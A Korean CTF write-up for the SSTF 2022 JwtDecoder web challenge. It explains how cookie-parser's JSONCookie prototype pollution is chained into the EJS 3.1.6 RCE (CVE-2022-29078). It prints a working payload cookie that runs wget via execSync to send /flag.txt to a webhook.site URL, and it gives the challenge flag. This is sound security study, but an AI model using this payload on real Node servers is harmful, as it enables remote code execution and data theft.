Home
/
System Hacking
WEB Hacking
Writeup
/
🍪

JwtDecoder writeup

Type
CTF
년도
2022
Name
SSTF
분야
WEB
세부분야
Prototype Pollution
2022/08/28 18:54
점수
100점대
1 more property

풀이 사전 지식

+ Node JS
CVE-2022-29078
Prototype Pollution

# Problem

SamsungCTF/2022_Hackers_Playground/JwtDecoder at main · SSTF-Office/SamsungCTF
Challenge problem for SCTF(Hacker's playground) 2022. Einstrasse Web Known but not patched vulnerability for wide-spread node module Not widely known feature for wide-spread node module Challenge provides full source code of node server. User should trigger arbitrary code execution to get the flag. Challenge should consider side-effect between users, because its intended vulnerabiliy category is RCE.
https://github.com/SSTF-Office/SamsungCTF/tree/main/2022_Hackers_Playground/JwtDecoder

# Solving strategy

1.
flag를 읽어오기 위해서는 RCE가 가능해야한다.
a.
여기서 사용하는 ejs 3.1.6 버전에는 RCE 취약점이 존재 - 참조
2.
RCE 취약점을 트리거 하기 위해서 prototype pollution 취약점이 터져야 한다.
a.
cookie-parserJSONCookie라는 기능이 존재 - 참조

# Exploit

# Payload

아래의 쿠키를 전송
jwt=j:{"settings":{"view options":{"outputFunctionName":"x%3Bprocess.mainModule.require('child_process').execSync('wget --header=\"flag:`cat /flag.txt`\" https://webhook.site/3a46ada2-7b31-46be-a18a-a48243b3b69a')%3Bs"}}}
JSON
복사

# Flag

SCTF{p0pul4r_m0dule_Ar3_n0t_4lway3_s3cure}
Plain Text
복사

# Reference

Node JS prototype pollution to RCE / express-fileupload@1.1.6 + EJS
http://blog.p6.is/Real-World-JS-1/ posix님이 발견하신 CVE-2020-7699 취약점이 너무나 흥미로워 보였고, 유익한 내용이기에 적어본다. 실습 환경은 express-fileupload@1.1.6 버전을 사용해야한다. 우선, proto..
https://littledev0617.tistory.com/5
EJS, Server side template injection RCE (CVE-2022-29078) - writeup
Note: The objective of this research or any similar researches is to improve the nodejs ecosystem security level. Recently i was working on a related project using one of the most popular Nodejs templating engines Embedded JavaScript templates - EJS In my weekend i started to have a look around to see if the library is vulnerable to server side template injection.
https://eslam.io/posts/ejs-server-side-template-injection-rce/
Made with